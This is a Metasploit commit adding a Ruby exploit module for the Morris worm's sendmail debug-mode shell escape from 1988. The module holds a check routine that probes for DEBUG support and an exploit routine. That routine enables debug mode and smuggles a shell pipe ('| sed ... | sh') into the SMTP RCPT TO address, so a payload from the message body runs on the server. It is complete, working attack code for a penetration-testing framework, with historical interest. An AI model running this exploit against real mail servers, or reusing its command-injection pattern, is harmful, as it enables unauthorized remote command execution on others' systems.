Add Morris worm sendmail debug mode exploit

rapid7 · busterb · Nov 2, 2018 · Oct 20, 2018 · Oct 20, 2018 · Oct 20, 2018
commit ad6f15c8ca8dcc33b4434c29a6007a0e107bca9f
diff --git a/modules/exploits/unix/smtp/morris_sendmail_debug.rb b/modules/exploits/unix/smtp/morris_sendmail_debug.rb
@@ -0,0 +1,105 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Morris Worm sendmail Debug Mode Shell Escape',
+      'Description'    => %q{
+        This module exploits sendmail's well-known historical debug mode to
+        escape to a shell and execute commands in the SMTP RCPT TO command.
+
+        This vulnerability was exploited by the Morris worm in 1988-11-02.
+        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.
+      },
+      'Author'         => [
+        'Robert Tappan Morris', # Exploit and worm for sure
+        'Cliff Stoll',          # The Cuckoo's Egg inspiration
+        'wvu'                   # Module and additional research
+      ],
+      'References'     => [
+        ['URL', 'https://en.wikipedia.org/wiki/Morris_worm'],         # History
+        ['URL', 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf'],  # Analysis
+        ['URL', 'https://github.com/arialdomartini/morris-worm'],     # Source
+        ['URL', 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH'] # Setup
+      ],
+      'DisclosureDate' => 'Nov 2 1988',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => false, # DefUid in src/conf.c, usually "daemon"
+      'Targets'        => [
+        # https://en.wikipedia.org/wiki/Source_Code_Control_System
+        ['@(#)version.c       5.51 (Berkeley) 5/2/86', {}]
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}
+    ))
+
+    register_options([Opt::RPORT(25)])
+  end
+
+  def check
+    checkcode = CheckCode::Safe
+
+    connect
+    res = sock.get_once
+
+    return CheckCode::Unknown unless res
+
+    if res =~ /^220.*Sendmail/
+      checkcode = CheckCode::Detected
+    end
+
+    sock.put("DEBUG\r\n")
+    res = sock.get_once
+
+    return checkcode unless res
+
+    if res.start_with?('200 Debug set')
+      checkcode = CheckCode::Appears
+    end
+
+    checkcode
+  rescue Rex::ConnectionError => e
+    vprint_error(e.message)
+    CheckCode::Unknown
+  ensure
+    disconnect
+  end
+
+  def exploit
+    sploit = [
+      'DEBUG',
+      "MAIL FROM:<#{rand_text_alphanumeric(8..42)}>",
+      # Strip mail header with sed(1), clean exit
+      %(RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">),
+      'DATA',
+      payload.encoded,
+      '.',
+      'QUIT'
+    ]
+
+    print_status('Connecting to sendmail')
+    connect
+
+    print_status('Enabling debug mode and sending exploit')
+    sploit.each do |line|
+      sleep 0.1
+      print_status(line)
+      sock.put("#{line}\r\n")
+    end
+  rescue Rex::ConnectionError => e
+    fail_with(Failure::Unreachable, e.message)
+  ensure
+    disconnect
+  end
+
+end